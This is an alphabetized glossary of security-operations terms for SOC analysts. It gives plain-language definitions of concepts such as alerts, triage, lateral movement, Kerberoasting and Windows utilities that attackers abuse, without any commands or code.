SHARED VOCABULARY

The C.L.E.A.R. Glossary

Common Lexicon of Essential Analyst References.

The plain-language definitions for the words analysts use most. Alphabetized, searchable, and shareable. When two people on a call mean different things by “scope” or “alert,” this is the page to settle it.

RANDOM SPOTLIGHT · refresh or click 🎲

A

Access Control: Rules and procedures that regulate who can access certain systems, data, or resources.
Access Pattern: The way a user or system interacts with resources, such as login times, frequency of access, and volume of data transferred.
Advanced Persistent Threats (APTs): Sophisticated cyber attackers, often state-sponsored, who gain and maintain unauthorized access to networks for extended periods while avoiding detection.
AI/ML (Artificial Intelligence / Machine Learning): Technologies that enable systems to learn from and make decisions based on data, used in security for threat detection, pattern recognition, and automated response.
Alert: An automated notification produced when detection logic decides an event might be malicious, anomalous, or in violation of policy. The detection engine’s hypothesis, not a verdict; the analyst makes the call.
Alert De-duplication: The process of consolidating multiple identical or related alerts into a single notification to reduce noise and improve analyst efficiency.
Alert Fatigue: The desensitization of security analysts to alerts due to high volumes of notifications, potentially leading to missed critical threats.
Alert Parsing: The systematic process of breaking down and analyzing the components of a security alert to understand its technical details and significance.
Alert Validation: The step where an alert is examined and confirmed as legitimate or false-positive before initiating further investigation or response.
Analyst Burnout: Physical and mental exhaustion experienced by security analysts due to high-stress environments, constant alert monitoring, and pressure to maintain security.
Anomaly: An observation that deviates from an established baseline. Anomalies are statistical, not malicious; an analyst still has to decide whether the deviation matters.
Anomaly-Based Detection: A security detection method that identifies suspicious activity by comparing current behavior against established baselines of normal activity.
Application-Layer Protocol: Network protocols that operate at Layer 7 of the OSI model, dealing with application-specific communication (HTTP, SMTP, DNS).
Application Programming Interface (API): A set of rules and protocols that allows different software systems to communicate with each other.
Arbitrary Commands: Unauthorized commands that an attacker can execute on a compromised system, often with the same privileges as the compromised application.
Artifacts: Digital evidence or traces left behind by system activity or security incidents, used in forensic analysis and incident investigation.
Asset: Something the organization owns, depends on, or is accountable for: data, a system, an identity, a credential, or a service. An asset’s criticality is what turns a generic alert into a prioritized one.
Asset Criticality: The level of importance or sensitivity of an asset, which determines the level of protection it requires.
Asset Role: The defined function or purpose of an asset within an organization, helping prioritize its security importance.
ASSURED Methodology: A structured approach to event triage in security operations, comprising seven phases: Alert, Subject, Scope, Uncover, Risk, Escalation, and Documentation.
Attack Chain: The ordered sequence of steps an attacker takes from initial access through their objective. Useful as a framework (Lockheed Martin’s Kill Chain, MITRE ATT&CK’s tactics) because it lets defenders intervene at any link, not only the first.
Attack Patterns: Common techniques or behaviors used by attackers that help in recognizing and defending against threats.
Attack Vector: The entry point an attacker uses to reach a target: a phishing email, an exposed RDP port, a third-party vendor with trusted access, a misconfigured cloud bucket. Each vector implies a different control to harden.
Attribute-Based Access Control (ABAC): Restricts access based on user attributes, environment conditions, and resource characteristics to enforce fine-grained security policies.
Authentication: Proving who you are to a system: a password, a hardware token, a biometric, a certificate. Distinct from authorization, which is what that identity is then allowed to do.
Authorization: The process of granting or denying access to resources based on a user’s or system’s identity and permissions.
Automation: The use of technology to perform security tasks with minimal human intervention, including alert triage, incident response, and threat hunting.
Autonomous System Number (ASN): A unique identifier assigned to an internet network used for routing traffic between networks.

B

Base64 Encoding: A binary-to-text encoding scheme used to represent binary data using a set of 64 characters, often used by malware to obfuscate payloads or communications.
Baselining: The process of documenting and measuring normal system behavior over time to identify deviations that might indicate security issues.
Behavior Analytics: The process of collecting and analyzing user and system behavior patterns to identify potential security threats or anomalies.
Behavioral Drift: Gradual changes in normal behavior patterns that may complicate detection of anomalies.
Biometric Verification: Authentication method that uses unique biological characteristics like fingerprints or facial recognition.
BITSAdmin: A command-line tool for managing Background Intelligent Transfer Service (BITS), often monitored for abuse by attackers.
Blockchain: A distributed ledger technology that maintains a secure, decentralized record of transactions, introducing new security considerations for digital assets and smart contracts.
Border Gateway Protocol (BGP): The protocol managing how packets are routed across the internet between autonomous systems.
Bring Your Own Device (BYOD): A policy allowing employees to use personal devices for work, which introduces unique security challenges.
Business Continuity: The ability of an organization to continue operating and providing services despite disruptions or disasters.
Byte Sequence: An ordered set of bytes in memory or data streams, often analyzed in malware detection or forensics.

C

Cardholder Data Environment (CDE): Systems and networks that store, process, or transmit payment card data and must comply with PCI DSS requirements.
certutil.exe: A Windows command-line tool used for certificate management and sometimes exploited by attackers for malicious purposes.
CIA Triad: Core principles of information security: Confidentiality, Integrity, and Availability.
California Consumer Privacy Act (CCPA): A law that regulates the collection, use, and protection of personal data in California.
Cloud Security Posture Management (CSPM): Tools and processes that continuously monitor cloud infrastructure for misconfigurations, compliance violations, and security risks.
Command and Control (C2): Infrastructure used by attackers to communicate with and control compromised systems within a target network.
Command Line: In SOC analysis, the argument string a process was launched with. Often the load-bearing forensic field on an EDR alert because it reveals what the process was actually told to do.
Command Line Analysis: The examination of command-line parameters, arguments, and execution context to understand process behavior and intent.
Common Event Format (CEF): A standardized log format designed to simplify event management across security devices and systems.
Common Vulnerability Scoring System (CVSS): A standardized way to assess the severity of security vulnerabilities.
Compliance: Adherence to regulatory requirements, industry standards, and security frameworks that govern data protection and system security.
Concatenation: The process of combining multiple strings or commands, often used by attackers to bypass security controls or obfuscate malicious code.
Conditional Logic: Programming or rule-based logic that executes actions based on specific conditions or criteria.
Configuration Management: The process of tracking and controlling changes to systems, networks, and applications.
Configuration Management Database (CMDB): Repositories that store information about IT assets and their relationships to support change and incident management.
Containers: Lightweight, standalone packages that include everything needed to run a piece of software, introducing unique security challenges in orchestration and isolation.
Container Orchestration: Automated management, scaling, and deployment of containerized applications using platforms like Kubernetes.
Containment: The incident-response phase between detection and eradication: isolate the affected hosts, revoke the compromised credentials, block the C2 destinations, freeze the situation so it stops getting worse while the investigation continues.
Credential: Whatever the system accepts as proof of identity: a password, an API key, an OAuth token, a Kerberos ticket, an NTLM hash. Credentials are the highest-value loot in most intrusions; their theft is usually the pivot point.
Critical Infrastructure: Essential systems, networks, or assets that are critical to an organization’s operations or national security.
Cross-System: Interactions or communications that occur between different systems or platforms within an infrastructure.
Cybercriminals: Individuals or groups who use technology to commit crimes, including data theft, fraud, and system compromise for financial gain.

D

Data Aggregation: The process of collecting and combining data from multiple sources for analysis, potentially revealing security patterns or threats not visible in isolated data sets.
Data Breach: The unauthorized access, theft, or exposure of sensitive data.
Data Exfiltration: The unauthorized transfer of data from a computer or network to an external location or system.
Data Integrity: Ensuring data is accurate, complete, and unaltered during storage, processing, and transmission.
Data Loss Prevention (DLP): A set of tools and processes that help prevent sensitive data from being lost, stolen, or compromised.
Data Protection: The processes and technologies used to protect sensitive data from unauthorized access, theft, or damage.
Data Retention: The policies and procedures that govern how long data is stored and retained.
Deception Technology: Security tools and techniques that deploy decoys and traps to detect, deflect, and analyze unauthorized system access attempts.
Deep Packet Inspection (DPI): A technique used to inspect and analyze network traffic to detect and block malicious activity.
Detection Logic: The rule, model, or heuristic that decides whether a given input fires an alert. The logic that produced the alert matters as much as the alert it produced; two engines can name the same alert for very different reasons.
Detection Mechanism: Tools or methods employed to identify security incidents, including signature, anomaly, and behavioral detections.
Device Fingerprint: A unique identifier derived from hardware or software characteristics used to recognize devices.
Digital Forensics: The analysis and examination of digital evidence to investigate and solve crimes or security incidents.
Digital Signatures: Cryptographic techniques that validate the authenticity and integrity of digital messages or documents.
Disaster Recovery: The process of restoring systems, networks, and operations after a disaster or major disruption.
Distributed Denial-of-Service (DDoS): A type of attack where multiple systems are used to flood a targeted system or network with traffic in an attempt to overwhelm it.
Distribution Pipelines: Processes and tools used to deploy software or updates from development to production environments.
DLL Loading: The process of loading Dynamic Link Libraries into a program’s memory space, which can be exploited by attackers for malicious code execution.
Domain: A unique name or identifier for a system, network, or organization on the internet.
Domain Admin: The most powerful account class in a Windows Active Directory domain: full administrative control over every domain-joined host, every domain user, and the directory itself. Compromise of a Domain Admin account is generally treated as a domain compromise.
Domain-based Message Authentication, Reporting, and Conformance (DMARC): An email validation system to prevent spoofing.
Domain Controller: A server that responds to security authentication requests in a Windows domain environment.
Domain Depth: The hierarchical level or complexity within a domain namespace or network structure.
Domain Keys Identified Mail (DKIM): An email authentication method that verifies message integrity and sender identity.
Domain Name System (DNS): A system that translates domain names into IP addresses.
Domain Name System Exfiltration: A technique where data is covertly sent out of a network using DNS queries.
Domain Name System Query: A request sent to a DNS server to resolve a domain name into an IP address.
Domain Trusts: Relationships established between domains to allow resource sharing and authentication.
Dynamic Link Library (DLL): A collection of executable functions or data that can be used by multiple programs.
Dynamic Prioritization: Adaptive adjustment of alert or incident priority based on contextual risk factors.

E

Electron Framework: An open-source framework for building cross-platform desktop applications using web technologies.
Encoded Payloads: Malicious code or commands that have been transformed into a different format to avoid detection or bypass security controls.
Encryption: The process of converting plaintext data into unreadable ciphertext to protect it from unauthorized access.
Endpoint: A device that initiates network connections and runs user-facing software: laptop, desktop, server, phone, tablet. Endpoints are where most adversary tradecraft eventually shows up, which is why EDR exists.
Endpoint Detection and Response (EDR): Security technology that continuously monitors and responds to threats on endpoint devices, providing advanced threat detection and incident response capabilities.
Endpoint Security: The processes and technologies used to protect endpoint devices from security threats.
Enterprise: A large organization or business that operates in multiple locations or countries.
Entitlement Matrix: A framework mapping user roles to their access permissions within systems.
Entity: A person, system, or organization that interacts with or affects a security incident.
Entropy Scoring: A method to measure randomness or complexity in data, often used to detect obfuscation or encryption.
Ephemeral Computing: A computing model where resources, such as containers or serverless functions, are temporary and exist only for the duration of a specific task or process.
Eradication: The phase of incident response focused on completely removing threat actors and malicious artifacts from affected systems.
Escalation Matrix: A predetermined framework defining when and how to elevate security incidents to higher levels of response based on severity and impact.
Evasion: Techniques used by attackers to avoid detection by security tools.
Event: An observable thing that happened: a process executed, a user logged in, a file changed, a packet was sent. Events are what produce alerts when detection logic decides they’re interesting. Most events are not alerts; most alerts are events.
Event Context: The circumstances and environment surrounding a security event.
Event Correlation: The process of analyzing multiple events across different sources to identify relationships and determine if they are part of a larger security incident.
Event Triage: The phase that sits between detection and incident response: deciding whether an alert is real, whom it concerns, what its blast radius might be, and whether it crosses an escalation threshold. The ASSURED methodology is a structured way to do triage.
Excessive Permissions: User or process privileges beyond what is necessary for their role, increasing security risk.
Exfiltration: The unauthorized transfer of data from a system or network, often as part of a data breach or espionage operation.
Exploit: A technique or piece of code that turns a vulnerability into actual capability: remote code execution, privilege escalation, authentication bypass. A vulnerability without an exploit is theoretical; a vulnerability with one is operational.

F

False Positive: A security alert that fires on activity that is, on inspection, benign. The detection logic matched a pattern that looked malicious but was not. Distinct from a benign true positive, which is real adversary-like activity that does not warrant action in the local context.
False-Premise: An incorrect assumption or conclusion about a security event that leads to improper investigation or response.
Federation: A system allowing users to access multiple independent systems using a single set of credentials.
Feedback Loop: A process where information from outcomes is used to improve future detection or response.
FIDO2: An authentication standard enabling passwordless login using biometrics or security keys.
File Integrity Monitoring (FIM): A security control that detects unauthorized changes to files or configurations.
Firewall: A network security system that controls and monitors incoming and outgoing traffic based on predetermined security rules.
Forensics: The application of scientific methods to collect, preserve, and analyze digital evidence for security investigations and incident response.
Framework: A structured approach or set of guidelines used to build security programs or processes.
Fully Qualified Domain Name (FQDN): The complete domain name specifying its exact location in the DNS hierarchy.

G

General Data Protection Regulation (GDPR): European Union regulation establishing requirements for processing and protecting personal data, with specific security and breach notification requirements.
Geolocation: The process of determining the physical location of a device or IP address.

H

Hashes: Cryptographic functions that generate fixed-size values representing digital data, used for file integrity verification and malware identification.
Health Insurance Portability and Accountability Act (HIPAA): U.S. legislation that sets standards for protecting sensitive patient health information, including specific security and privacy requirements.
Heuristic Detection: A detection method that uses rules and patterns to identify potentially malicious behavior based on common characteristics of malware or attacks.
Honeypot: A decoy system designed to lure attackers and study their tactics.
HTA Content: HTML Application files that can execute scripts, sometimes abused for malicious purposes.
Hybrid Infrastructure: Computing environment that combines on-premises, private cloud, and public cloud services.
Hyper-Text Transfer Protocol (HTTP): The foundation protocol for data communication on the web.
Hyper-Text Transfer Protocol Secure (HTTPS): Secure version of HTTP using encryption to protect data in transit.

I

Impact: The potential effect or damage caused by a security incident.
Incident: A confirmed compromise of confidentiality, integrity, or availability: an alert (or series of alerts) that triage has validated as real adversary activity, warranting an IR response. An event becomes an incident at the verdict, not at the alert.
Incident Command: A structured leadership model used to manage complex security incidents.
Incident Response: The organized approach to addressing and managing the aftermath of a security breach or cyberattack, including preparation, detection, analysis, containment, eradication, and recovery.
Indicators of Compromise (IoC): Atomic, replayable artifacts that, when observed, suggest an intrusion has occurred or is in progress: file hashes, IPs, domains, registry keys, certificate fingerprints, and similar discrete observables. Behavioral patterns (process trees, sequence of actions) are not IoCs; they live one layer up as TTPs.
Information Security: The practices and technologies used to protect information and data from unauthorized access, use, disclosure, disruption, modification, or destruction.
Information Sharing and Analysis Centers (ISACs): Industry groups that share cyber threat information.
Information Technology Service Management (ITSM): Frameworks and tools to manage IT services and processes.
Infrastructure: The underlying systems, networks, and architecture that support an organization’s operations.
Insider Risk: The potential for harm from individuals with legitimate access arising from mistakes, policy violations, or unsafe habits, not from intent. Distinct from insider threat, which is deliberate.
Insider Threats: Personnel with authorized access who intentionally or unintentionally pose a risk to organizational security through misuse, theft, or sabotage.
Insider Threat Matrix: A framework for categorizing and understanding different types of insider threats based on motivation, access level, and potential impact.
Integrated Development Environment (IDE): Software that provides comprehensive facilities to programmers.
Intelligence: Information gathered and analyzed to understand and predict potential security threats.
IntelliSense: A code-completion aid commonly found in development environments.
Inter-Process Communication: Mechanisms that allow different processes to communicate within an operating system.
Internet of Things (IoT): Network of physical devices embedded with sensors, software, and connectivity, introducing new security challenges due to their often limited security capabilities.
Internet Protocol (IP) Address: A unique address assigned to a device or system on a network.
Intrusion Detection System (IDS): Security system that monitors network traffic for suspicious activity and policy violations, generating alerts for potential security incidents.
Intrusion Prevention System (IPS): Security system that not only detects but actively blocks or prevents identified suspicious activity and policy violations.
Isolated Execution Environment: A secure area where code runs isolated from other system components to prevent interference.
Isolation Forests: A machine learning algorithm used for anomaly detection by isolating anomalies in data.

J

JA3: A method for fingerprinting TLS client applications by hashing specific fields in the TLS Client Hello packet.
JA3S: The server-side counterpart to JA3, it fingerprints TLS servers by hashing fields in the Server Hello packet.

K

Kerberoasting: Requesting Kerberos service tickets (TGS) for accounts with Service Principal Names (SPNs) and cracking them offline. The ticket portion is encrypted with the service account’s NTLM hash, so a weak service-account password becomes a crackable ciphertext, and any user who can authenticate to the domain can request the ticket.
Kerberos: A network authentication protocol using tickets to allow secure identity verification.
Kubernetes: An open-source system for automating deployment, scaling, and management of containerized applications.

L

Lateral Movement: Adversary traversal from the initial-access host to other hosts inside the environment. Each hop expands the blast radius and adds new entities for Subject analysis. Often piggybacks on legitimate authentication, which is what makes it hard to detect.
Least Privilege: The principle of granting users or systems only the necessary permissions and access to perform their tasks.
Legacy Systems: Outdated technology or systems that remain in use, often with security vulnerabilities.
Lessons Learned: Insights gained from past incidents or activities to improve future security posture.
Likelihood: The probability that a threat will exploit a vulnerability.
Liveness Detection: Techniques used to verify that biometric inputs are from a live person, not a spoof.
Living-Off-The-Land (LotL): Attack technique utilizing legitimate, built-in system tools and features to conduct malicious activities while evading detection.
Log: A record of events, transactions, or activities in a system or network.
Log Parsing: The systematic process of analyzing and extracting relevant information from system, application, and security logs for investigation and threat detection.
LSTM Networks: A type of recurrent neural network useful in analyzing sequential data for anomaly detection.

M

Machine Learning: The use of algorithms and statistical models that enable computer systems to improve their performance on a specific task through experience.
Malware: Software whose author intends harm: ransomware, trojans, worms, viruses, spyware, wipers, rootkits, RATs. The B.A.D. glossary catalogs the families in detail.
Mandatory Access Control: An access policy where permissions are centrally controlled and enforced based on classifications.
MD5: A widely used hash function that produces a 128-bit hash value, though now considered weak.
Mean Time To Respond/Resolve (MTTR): A metric measuring how quickly incidents are resolved.
Metadata: Data about data: file timestamps, owner, size, hash; an email’s headers; a process’s parent, command line, and signing certificate. In triage, metadata is often more diagnostic than the content itself.
Methodology: A systematic framework or approach for conducting security operations or investigations.
Middleware: Software that connects different applications or systems to enable communication and data exchange.
Mitigation: Action that reduces a risk without eliminating it: a compensating control, a workaround, a temporary block. Distinct from remediation, which fixes the underlying issue.
MITRE ATT&CK: A globally-accessible knowledge base of adversary tactics and techniques based on real-world observations, used for threat modeling and security operations.
MITRE Procedures: Specific implementation methods used by threat actors to accomplish techniques within the ATT&CK framework.
MITRE Tactics: Categories representing the tactical goals of adversaries during an attack, such as initial access, execution, persistence.
MITRE Techniques: Specific methods used by adversaries to achieve tactical goals within the ATT&CK framework.
Model Training: The process of teaching a machine learning model to recognize patterns using labeled data.
Mshta.exe: A Windows utility for executing Microsoft HTML Applications, sometimes exploited by attackers.
Multi-Cloud Environment: Infrastructure utilizing multiple cloud service providers, introducing complex security challenges in maintaining consistent security controls and visibility.
Multi-Factor Authentication (MFA): Security system requiring two or more verification methods to grant access, combining something you know, have, or are.

N

Nested Data: Data structures where elements contain other data structures, common in logs and JSON.
Network: A collection of interconnected devices, systems, or servers that communicate with each other.
Network Access Control (NAC): Security solutions that enforce policies on devices trying to access a network.
Network Segmentation: The division of a network into smaller, isolated segments to improve security and reduce the attack surface.
Network Traffic: The flow of data between devices, systems, or servers on a network.
Node: A device or system that is connected to a network.
Normalization: The process of transforming data into a standard format to improve analysis and comparison.

O

Obfuscation: Techniques used to make code, commands, or data difficult to understand or detect, used both by attackers and legitimately for IP protection.
OpenC2: An open standard for command and control of cyber defense components.
Oracle Cluster File System (OCFS): A shared file system used in clustered environments.
Organizationally Unique Identifier (OUI): The first 24 bits of a MAC address that identify the manufacturer.
Orphaned Credentials: Access credentials no longer associated with an active user or process, posing a security risk.
OSA Model: Open Security Architecture model used for designing security frameworks.

P

Parsing: The process of analyzing data structures or code to extract meaningful information.
Packet Capture Files (PCAP): Files used to record network traffic for analysis.
Pass-The-Hash: An attack technique that allows an attacker to authenticate to a remote server/service using the underlying NTLM or LM hash of a user’s password instead of the password itself.
Password: A secret word or phrase used to authenticate a user or system.
Patch Management: The process of applying updates and fixes to software and systems to repair vulnerabilities and improve security.
Payment Card Industry Data Security Standard (PCI DSS): Security standards designed to ensure companies that accept, process, store, or transmit credit card information maintain a secure environment.
Penetration Testing: A simulated attack on a system or network to test its defenses and identify vulnerabilities.
Peer Validation: A method of verifying information or alerts through cross-checking with other sources.
Permission Mapping: The process of correlating user roles with their granted permissions.
Persistence: Mechanisms an adversary installs so their access survives reboots, password resets, and partial cleanups: Run keys, scheduled tasks, services, WMI subscriptions, browser extensions. Mature operators plant several anchors so removing one is not enough.
Personally Identifiable Information (PII): Data that can uniquely identify an individual.
Phishing: Deceptive messages (usually email; sometimes SMS, voice, or chat) that impersonate a trusted sender to lure the recipient into clicking, opening, or entering credentials. The bait is the email; the line is the impersonation; the catch is initial access.
Polymorphic Malware: Malicious software that constantly changes its identifiable features to avoid detection by traditional signature-based security tools.
Port: A communication endpoint used by protocols to send and receive data.
Post-Mortem: The structured retrospective an organization runs after a closed incident: timeline, decisions, what worked, what failed, what the team learned. A good post-mortem points back at detection, process, or training gaps. A blameless one names the system, not the person.
Potential Impact, Actor Sophistication, Context, Escalation Criteria (PACE): A framework used in this methodology to assess and prioritize security incidents. Not to be confused with the military communications PACE (Primary, Alternate, Contingency, Emergency).
PowerShell: A command-line shell and scripting language built on the .NET framework, commonly used for system administration and potentially for malicious purposes.
Privilege Escalation: Gaining access at a higher trust level than the actor originally held, by any means: exploiting a bug, abusing a misconfiguration, stealing credentials, impersonating a token, or socially engineering an elevation.
Privileged Access Management (PAM): Technologies that control and monitor access to critical accounts.
Process: A series of actions or steps taken to achieve a specific goal or task.
Process Relationships: The connections and interactions between different processes running on a system, including parent-child relationships and inter-process communication.
Protected Health Information (PHI): Any information about health status, provision of care, or payment.
Protocol: A set of rules and standards that govern communication between devices, systems, or networks.

R

Ransomware: Malicious software that encrypts a victim’s files and demands payment (usually cryptocurrency) for the decryption key. Modern ransomware operations typically pair encryption with data theft, threatening public release if the ransom is not paid (double extortion).
Regsvr32.exe: A Windows utility used to register and unregister DLLs, sometimes exploited by malware.
Regulatory Compliance: Adherence to laws, regulations, and standards governing data protection, privacy, and security requirements for specific industries or data types.
Regulatory Requirements: Laws and policies organizations must follow to ensure compliance and security.
Relationship Mapping: The process of identifying and visualizing connections between entities like users, systems, or processes.
Reliability Assessment: Evaluating the trustworthiness and accuracy of security data or alerts.
Request For Comment (RFC): A series of documents that define internet standards and protocols.
Resource Allocation: Assigning personnel, tools, and time to address security tasks or incidents.
Return on Investment (ROI): Analysis of security investments comparing the cost of security controls against potential losses from security incidents.
Risk: Impact times likelihood, weighted by the analyst’s confidence in the evidence. Risk is what turns a finding into a prioritized response; it’s the verdict the rest of the team acts on.
Risk Appetite: The amount of risk an organization is willing to accept in pursuit of objectives.
Risk Assessment: Systematic process of evaluating potential risks to system and data security, including likelihood and impact analysis.
Risk-Based Alert Triage Matrix: A tool to prioritize alerts based on risk factors to improve response effectiveness.
Risk Management: The process of mitigating, transferring, or accepting risk to minimize its impact on an organization.
Risk Profile: An assessment of risks associated with assets, users, or processes.
Role-Based Access Control (RBAC): A model that assigns permissions based on user roles.
Root Cause Analysis: The process of identifying the underlying cause of a security incident or problem.
Router: A device that forwards data packets between networks.
Rule-Based Detection: Security monitoring approach using predefined rules to identify suspicious or malicious activity based on specific conditions or patterns.
Rundll32.exe: A Windows utility that executes functions in DLL files, sometimes used maliciously.

S

Sandboxing: Detonating an unknown file or URL inside an isolated environment to observe what it does. Mature malware checks for sandbox-typical signals (small disk, brief uptime, no mouse activity, suspicious driver names) and stays dormant until it sees a real host.
Sarbanes-Oxley Act (SOX): A law that regulates financial reporting and corporate governance in the United States.
Schema Normalization: The process of organizing data into a structured format to reduce redundancy and improve analysis.
Scope: The defined boundaries of a security investigation or incident response, including affected systems, timeframes, and areas of concern.
Scope Creep: Uncontrolled expansion of an incident investigation beyond its initial parameters, potentially consuming excessive resources without proportional benefit.
Scope Drift: Gradual deviation from the original scope or objectives over time.
Secure Email Gateways (SEG): Security solutions that filter and protect email communications from threats.
Secure Hash Algorithm (SHA): A family of cryptographic hash functions used for data integrity.
Secure Shell (SSH): A protocol for secure remote login and command execution.
Secure Socket Layer (SSL): A deprecated protocol for encrypting internet communications, replaced by TLS.
Security Control: A measure or mechanism used to prevent, detect, or respond to a security threat or incident.
Security In Depth: A layered security approach that combines multiple controls to protect assets.
Security Information and Event Management (SIEM): Platform that collects, aggregates, and analyzes security data from multiple sources to provide real-time monitoring, correlation, and incident response capabilities.
Security Operations: The people, processes, and technology responsible for monitoring, detecting, investigating, and responding to security threats within an organization.
Security Orchestration, Automation, and Response (SOAR): Platforms that codify SOC workflows into playbooks: enrich an alert, query telemetry, look up an indicator, open a case, page on-call. SOAR makes the repetitive parts of triage repeatable.
Sender Policy Framework (SPF): An email validation protocol to prevent sender address forgery.
Sensitive Data: Information that is confidential, proprietary, or regulated, such as personal data, financial information, or intellectual property.
Separation of Duties: A control to prevent fraud by dividing responsibilities among multiple people.
Server: A computer or device that provides services, resources, or data to other devices or systems on a network.
Server Message Block (SMB): A network protocol for sharing files and printers.
Serverless Functions: Cloud-computing execution model where cloud providers manage infrastructure, presenting unique security monitoring and access control challenges.
Side-Loading: A technique where attackers exploit legitimate applications to load malicious DLLs or code, often bypassing security controls.
Signature-Based Detection: Security method that identifies threats by matching observed activity against a database of known malicious patterns or signatures.
Signature Database: A repository of known threat signatures used by security tools.
Signature Management: The process of updating and maintaining detection signatures in security systems.
Single Sign-On (SSO): An authentication process allowing a user to access multiple systems with one set of credentials.
Social Engineering: Manipulating people into divulging confidential information or performing actions that compromise security.
Statistical Models: Mathematical models that analyze data distributions and relationships to detect anomalies or predict outcomes.
String Concatenation: The operation of joining two or more strings end-to-end.
Structured Query Language (SQL): A programming language used to manage and manipulate data in databases.
Structured Threat Information Express (STIX): A standardized format for sharing cyber threat intelligence.
Subject: An entity, such as a user or system, that is involved in a security incident or event.
Supply Chain: The network of organizations, people, activities, and resources involved in creating and delivering products, presenting multiple attack vectors for compromising systems or software during development and distribution.
Syslog: A standard protocol for message logging in network devices and systems.
System: A collection of hardware, software, and firmware that work together to perform a specific function or task.
System Binary: Executable files that are part of an operating system or trusted software components.

T

Tactics, Techniques, and Procedures (TTP): The behavioral patterns of a threat actor, in increasing specificity: tactics (goals), techniques (methods), and procedures (concrete implementations). Used to characterize and attribute adversary behavior across campaigns.
TCP Connection: A network communication session established between two hosts using the Transmission Control Protocol.
Telemetry: Collection and transmission of security-relevant data from remote sources for monitoring and analysis.
Temporal Relationships: The timing and sequence correlations between events that help in threat detection and analysis.
Threat: An actor (or capability) with intent and means to cause harm. A vulnerability is what they exploit; risk is the product of threat, vulnerability, and impact.
Threat Actor: Individual or group that conducts malicious activities targeting information systems or networks.
Threat Hunting: Proactive analysis that starts from a hypothesis (“if an attacker were here, what would I expect to see?”) and searches telemetry for evidence. Distinct from alert triage, which reacts to detections; hunting goes looking for what the detections missed.
Threat Intelligence: Evidence-based knowledge about existing or emerging threats, including context, mechanisms, indicators, implications, and actionable advice.
Ticket: A record or request for assistance or support, often used in help desks or incident response.
Timeline: A chronological record of events, actions, or decisions related to a security incident or event.
Time To Live (TTL): A field that limits the lifespan or hops of data packets in a network.
Token: A small piece of data or code that is used to authenticate or authorize access to a system or resource.
Traffic: The flow of data between devices, systems, or servers on a network.
Transport Layer Security (TLS): A protocol for encrypting internet communications.
Trojan: A type of malware that disguises itself as legitimate software to gain unauthorized access to a system or network.
True Positive: A security alert that fires on activity that is, on inspection, actual adversary behavior. The opposite of a false-positive, and the case the SOC exists to handle.

U

Unauthorized Access: Access to a system, network, or resource without proper authorization or permission.
Unmanaged Teams: Groups within an organization that operate without centralized security controls, posing risks.
Uniform Resource Identifier (URI): A string that identifies a resource on the internet.
Uniform Resource Locator (URL): The address used to access resources on the web.
User: An individual who interacts with a system, network, or application.
User Account: A unique identity or profile used to authenticate and authorize access to a system or resource.
User and Entity Behavior Analytics (UEBA): Security technology that uses advanced analytics to build standard profiles of user and entity behavior, detecting anomalies that might indicate threats.

V

Variable Expansion: Replacing variables in scripts or commands with their actual values during execution.
Variable Substitution: Programming technique often exploited by attackers to obscure malicious commands by replacing literal values with variables, making detection more difficult.
Virtual Desktop Infrastructure (VDI): Technology that hosts desktop environments on a central server.
Virtual Private Network (VPN): A secure tunnel that encrypts traffic between a user and a network.
VS Code: Visual Studio Code, a source code editor developed by Microsoft that serves as the foundation for other development tools like Cursor.
Vulnerability: A defect in a system that can be turned into adversary capability if paired with an exploit and exposure: an unpatched CVE, a misconfiguration, a default credential, a logic flaw. Vulnerability without exposure or exploitability is latent; with both, it’s a finding.
Vulnerability Management: Systematic practice of identifying, classifying, prioritizing, remediating, and mitigating security vulnerabilities across an organization’s systems and software.

W

Wildcard DNS: A DNS configuration that resolves all subdomains under a domain to a specified address.
Windows Event Logs: Logs generated by Windows operating systems recording system, security, and application events.
Windows Management Instrumentation Command-line (WMIC): A tool for managing Windows systems via scripting. Deprecated by Microsoft since Windows 10 21H1 (2021) but still ships on most Windows 11 builds, which is why it remains a favorite LOLBin in active intrusions. The modern equivalent is PowerShell’s Get-CimInstance / Invoke-CimMethod against the same WMI namespaces.

Z

Zero-Day Vulnerability: A vulnerability for which no patch is yet available, either because the vendor has not shipped one or because the vendor does not yet know the bug exists. Called “zero-day” because that is the number of days defenders have had to prepare. Exploitation is not a definitional prerequisite; a zero-day can exist before any exploit appears.